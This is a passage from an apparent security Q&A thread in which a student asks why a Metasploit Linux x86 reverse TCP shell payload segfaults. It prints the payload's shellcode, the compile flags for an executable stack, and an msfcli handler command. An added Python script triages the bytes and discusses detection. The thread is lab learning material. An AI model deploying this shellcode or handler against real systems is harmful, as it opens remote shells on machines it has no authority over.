How do I run the linux/x86/shell_reverse_tcp payload standalone?

Time: 2014-01-04 21:21:31

Tags: metasploit

I'm trying to run the linux/x86/shell_reverse_tcp payload. If I look at the payload's summary, it looks like a host and a port are the two requirements, as shown below.

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_reverse_tcp S

       Name: Linux Command Shell, Reverse TCP Inline
     Module: payload/linux/x86/shell_reverse_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 190
       Rank: Normal

Provided by:
  Ramon de C Valle <rcvalle@metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

Since I'm running it on the local host, I used ifconfig to find my local IP address. It appears to be 10.0.1.38, as shown below

max@ubuntu-vm:~/SLAE/mod2$ ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:bf:ec:33  
          inet addr:10.0.1.38  Bcast:10.0.1.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:febf:ec33/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7866 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5066 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3043939 (3.0 MB)  TX bytes:1149171 (1.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:310 errors:0 dropped:0 overruns:0 frame:0
          TX packets:310 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:29143 (29.1 KB)  TX bytes:29143 (29.1 KB)

So I used the msfpayload command to output the shellcode, put it into my shellcode sandbox, and compiled it

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload \
              -p linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 C
/*
 * linux/x86/shell_reverse_tcp - 68 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=10.0.1.38, LPORT=3333, 
 * ReverseConnectRetries=5, ReverseAllowProxy=false, 
 * PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x00\x01\x26\x68"
"\x02\x00\x0d\x05\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc \
              -fno-stack-protector -z execstack -o shellcode shellcode.c

So everything seems fine, except that when I try to run the payload I get a segmentation fault. So my question is: how do I run this payload successfully?

max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  26
Segmentation fault (core dumped)
max@ubuntu-vm:~/SLAE/mod2$ 
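The "Shellcode Length: 26" line in the output above is worth a second look: the payload is 68 bytes, but 10.0.1.38 encodes as 0a 00 01 26, and a strlen()-based length stops at that first NUL byte after 26 bytes. The following Python script is an added example, not part of the question or of Metasploit; it does the static triage an analyst would do on a captured blob of this kind: it reports the strlen-visible length and NUL count, decodes the sockaddr_in that the two `push imm32` instructions build (family, port, address), and recovers the path string pushed onto the stack before execve. The payload bytes are copied from the question; every function name is my own.

```python
import socket
import struct

# The 68 payload bytes exactly as msfpayload printed them in the question.
SHELLCODE = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    b"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x00\x01\x26\x68"
    b"\x02\x00\x0d\x05\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
    b"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)

PUSH_IMM32 = 0x68  # x86 opcode: push a 4-byte immediate


def c_string_length(buf: bytes) -> int:
    """Length strlen() would report for this buffer: bytes before the first NUL."""
    idx = buf.find(b"\x00")
    return len(buf) if idx < 0 else idx


def find_sockaddr(buf: bytes):
    """Decode the sockaddr_in built by two consecutive `push imm32` instructions.

    Layout pushed (last push ends up lowest on the stack):
        push <ipv4 address, 4 bytes in network order>
        push <sin_port (2 bytes, network order) || sin_family (2 bytes, host order)>
    Returns None if no AF_INET pair is found.
    """
    for i in range(len(buf) - 9):
        if buf[i] != PUSH_IMM32 or buf[i + 5] != PUSH_IMM32:
            continue
        family = struct.unpack("<H", buf[i + 6:i + 8])[0]  # little-endian host order
        if family != 2:  # AF_INET on Linux
            continue
        lhost = socket.inet_ntoa(buf[i + 1:i + 5])
        lport = struct.unpack(">H", buf[i + 8:i + 10])[0]  # network byte order
        return {"offset": i, "lhost": lhost, "lport": lport}
    return None


def extract_pushed_string(buf: bytes) -> str:
    """Recover the longest ASCII string assembled on the stack by a run of `push imm32`.

    Each push stores 4 bytes; since the stack grows down, the pushes appear in
    reverse order of the final string, so a run is reversed before joining.
    """
    best, run, i = "", [], 0
    while i + 5 <= len(buf):
        imm = buf[i + 1:i + 5]
        if buf[i] == PUSH_IMM32 and all(0x20 <= b < 0x7F for b in imm):
            run.append(imm.decode("ascii"))
            i += 5  # skip over the whole instruction so its operand bytes are not re-scanned
            continue
        if run:
            candidate = "".join(reversed(run))
            best = candidate if len(candidate) > len(best) else best
            run = []
        i += 1
    return best


def triage(buf: bytes) -> dict:
    """Summarise what a defender wants to know about a captured connect-back blob."""
    return {
        "total_bytes": len(buf),
        "strlen_bytes": c_string_length(buf),
        "nul_bytes": buf.count(b"\x00"),
        "connect_back": find_sockaddr(buf),
        "exec_path": extract_pushed_string(buf),
    }


if __name__ == "__main__":
    for key, value in triage(SHELLCODE).items():
        print(f"{key:>13}: {value}")
```

Running it against the question's bytes reports 68 total bytes but a strlen of 26, two NUL bytes, a connect-back of 10.0.1.38:3333 and the path "/bin//sh"; the same scan works on any msfpayload output of this family where the address and port are pushed as immediates, which is why a blocklist on the exact byte string is a weaker detection than looking for the connect-then-dup2-then-execve structure.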

1 answer:

Answer 0 (score: 1)

This is a reverse shell; it needs something to connect to.
You have to configure and start a reverse handler, like this:

# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E